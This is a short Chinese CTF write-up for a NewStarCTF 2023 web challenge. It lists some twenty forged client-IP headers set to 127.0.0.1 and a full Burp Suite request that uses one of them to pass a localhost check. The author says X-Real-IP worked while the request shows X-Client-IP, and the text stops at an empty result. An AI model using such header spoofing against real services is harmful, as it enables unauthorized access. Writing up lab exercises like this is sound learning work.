昨天做了一道非常简单的新生赛CTF题目
前面的都非常简单,类似这种
当一步步按照题目的提示来到最后一步时:
第一时间想到改X-Forwarded-For为127.0.0.1,结果不行
后来网上一查,发现有很多种方法可以进行请求ip伪造
X-Forwarded-For:127.0.0.1
X-Forwarded:127.0.0.1
Forwarded-For:127.0.0.1
Forwarded:127.0.0.1
X-Forwarded-Host:127.0.0.1
X-remote-IP:127.0.0.1
X-remote-addr:127.0.0.1
True-Client-IP:127.0.0.1
X-Client-IP:127.0.0.1
Client-IP:127.0.0.1
X-Real-IP:127.0.0.1
Ali-CDN-Real-IP:127.0.0.1
Cdn-Src-Ip:127.0.0.1
Cdn-Real-Ip:127.0.0.1
CF-Connecting-IP:127.0.0.1
X-Cluster-Client-IP:127.0.0.1
WL-Proxy-Client-IP:127.0.0.1
Proxy-Client-IP:127.0.0.1
Fastly-Client-Ip:127.0.0.1
True-Client-Ip:127.0.0.1
Host: 127.0.0.1
X-Originating-IP: 127.0.0.1
一个一个试,最后使用的是 X-Real-IP:127.0.0.1
burpsuite发送
POST /?ctf=111 HTTP/1.1
Host: node4.buuoj.cn:26965
User-Agent:NewStarCTF2023
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: newstarctf.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
Origin: http://node4.buuoj.cn:26965
Connection: close
Cookie: power=ctfer
Upgrade-Insecure-Requests: 1
X-Client-IP: 127.0.0.1
secret=n3wst4rCTF2023g00000d
结果: